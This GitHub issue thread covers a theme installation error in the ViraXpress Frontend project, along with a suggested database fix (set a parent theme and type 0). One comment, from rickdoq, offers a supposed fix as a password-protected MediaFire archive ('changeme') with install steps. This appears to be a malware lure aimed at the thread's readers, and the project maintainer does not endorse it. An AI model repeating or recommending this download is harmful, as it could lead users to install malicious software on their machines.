### ISSUE TITLE
issue after installing Unable to find a physical ancestor for a theme 'ViraXpress Frontend'.

### ISSUE THREAD

**Issue by 5mehulhelp5** [viraxpress/Frontend#2]
If you found this error after installing then go to databse 
and check **theme** table and it should be like this.
![image](https://github.com/user-attachments/assets/020ff52f-08aa-438a-b38d-2cfb2a74d4ea)

**Comment by 5mehulhelp5** [comment]
you need to set parent theme and type should be 0

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by 5mehulhelp5** [comment]
@rickdoq  what is this files all about?

**Comment by viraxpress** [comment]
Hi @5mehulhelp5 ,  let us know if this is an issue we can assist you with.
